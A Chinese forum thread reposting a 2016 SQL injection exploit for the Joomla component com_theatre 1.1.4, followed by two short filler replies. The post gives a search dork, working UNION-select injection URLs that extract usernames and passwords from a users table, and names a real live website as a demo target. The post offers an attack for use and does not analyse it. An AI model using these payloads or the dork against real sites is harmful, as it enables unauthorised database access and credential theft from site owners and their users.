90_ 发表于 2016-7-11 10:20:12

Joomla com_threate 1.1.4注入漏洞

######################
# Exploit Title :  Joomla com_threate 1.1.4 SQL injection
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_threate
# version: 1.1.4
# Vendor Homepage : http://joomlic.com/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/09
# video Proof : https://youtu.be/WXqrK7dqGaY
######################
# PoC:
#   Get Parameter Vulnerable To SQL
#
# http://server/index.php?option=com_theatre&view=show&id=
#
# Demo
# http://server/index.php?option=com_theatre&view=show&id=36'
#
# http://server/index.php?option=com_theatre&view=show&id=-36  /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
#
# http://server/index.php?option=com_theatre&view=show&id=-36  /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aur_users--
#
# Live Demo :
# https://www.auroratheatre.org/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################

细草微风岸 发表于 2016-7-11 13:10:12

火钳留名:D

481326635 发表于 2016-7-11 14:27:05

火钳刘明:):):)
页: [1]
查看完整版本: Joomla com_threate 1.1.4注入漏洞